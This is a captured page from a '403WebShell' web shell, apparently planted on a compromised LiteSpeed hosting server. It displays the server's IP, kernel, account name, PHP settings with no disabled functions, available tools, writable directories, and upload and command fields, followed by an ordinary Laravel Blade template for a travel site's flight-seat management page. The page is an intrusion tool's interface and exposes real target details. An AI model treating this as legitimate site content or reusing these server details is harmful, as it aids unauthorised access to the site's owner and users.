Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.15.214.238
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/book24.ng/themes/Mytravel/Flight/frontend/manageFlight/seat/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/book24.ng/themes/Mytravel/Flight/frontend/manageFlight/seat/index.blade.php
@extends('layouts.user')
@section('head')

@endsection
@section('content')
    <h2 class="title-bar">
        {{__("Manage Seats")}}
        <div class="title-action">
            <a href="{{route('flight.vendor.edit',['id'=>$currentFlight->id])}}" class="btn btn-info"><i class="fa fa-hand-o-right"></i> {{__("Back to flight")}}</a>
            <a href="{{ route("flight.vendor.seat.create",['flight_id'=>$currentFlight->id]) }}" class="btn btn-success"><i class="fa fa-plus" aria-hidden="true"></i> {{__("Add Seat")}}</a>
        </div>
    </h2>
    @include('admin.message')
    <div class="row">
        <div class="col-md-4 mb40">
            <div class="panel">
                <div class="panel-title">{{__("Add Flight Seat")}}</div>
                <div class="panel-body">
                    <form action="{{route('flight.vendor.seat.store',['flight_id'=>$currentFlight->id,'id'=>$row->id??-1])}}" method="post">
                        @csrf
                        @include('Flight::admin.flight.seat.form')
                        <div class="">
                            <button class="btn btn-primary" type="submit">{{__("Add new")}}</button>
                        </div>
                    </form>
                </div>
            </div>
        </div>
        <div class="col-md-8">
            <div class="filter-div d-flex justify-content-between mb-4">
                <div class="col-left">
                    @if(!empty($rows))
                        <form method="post" action="{{route('flight.vendor.seat.bulkEdit',['flight_id'=>$currentFlight->id])}}" class="filter-form filter-form-left d-flex justify-content-start">
                            {{csrf_field()}}
                            <select name="action" class="form-control ">
                                <option value="">{{__(" Bulk Action ")}}</option>
                                <option value="delete">{{__(" Delete ")}}</option>
                            </select>
                            <button data-confirm="{{__("Do you want to delete?")}}" class="btn-info btn btn-sm dungdt-apply-form-btn ml-3" type="button">{{__('Apply')}}</button>
                        </form>
                    @endif
                </div>
                <div class="col-left">
                    <form method="get" action="{{route('flight.vendor.seat.index',['flight_id'=>$currentFlight->id])}} " class="filter-form filter-form-right d-flex justify-content-end" role="search">
                        <input type="text" name="s" value="{{ Request()->s }}" class="form-control" placeholder="{{__("Search by code")}}">
                        <button class="btn btn-info btn-sm ml-2" id="search-submit" type="submit">{{__('Search')}}</button>
                    </form>
                </div>
            </div>
            <div class="panel">
                <div class="panel-title">{{__("All Flight seat")}}</div>
                <div class="panel-body">
                    <form class="bravo-form-item">
                        <table class="table table-hover">
                            <thead>
                            <tr>
                                <th width="60px"><input type="checkbox" class="check-all"></th>
                                <th>{{__("Flight id")}}</th>
                                <th>{{__("Seat type")}}</th>
                                <th >{{__("Price")}}</th>
                                <th >{{__("Max passengers")}}</th>
                                <th class="date"></th>
                            </tr>
                            </thead>
                            <tbody>
                            @if(count($rows) > 0)
                                @foreach ($rows as $row)
                                    <tr>
                                        <td><input type="checkbox" class="check-item" name="ids[]" value="{{$row->id}}"></td>
                                        <td><a href="{{route('flight.vendor.edit',$row->flight)}}">#{{$row->flight->id}}</a></td>
                                        <td>{{$row->seatType->name}}</td>
                                        <td>{{format_money($row->price)}}</td>
                                        <td>{{$row->max_passengers}}</td>
                                        <td><a class="btn btn-primary btn-sm" href="{{route('flight.vendor.seat.edit',['flight_id'=>$currentFlight->id,'id'=>$row->id])}}"><i class="fa fa-edit"></i> {{__('Edit')}}</a></td>
                                    </tr>
                                @endforeach
                            @else
                                <tr>
                                    <td colspan="4">{{__("No data")}}</td>
                                </tr>
                            @endif
                            </tbody>
                            {{$rows->appends(request()->query())->links()}}
                        </table>
                    </form>
                </div>
            </div>
        </div>
    </div>
@endsection
@section('footer')

@endsection

Youez - 2016 - github.com/yon3zu
LinuXploit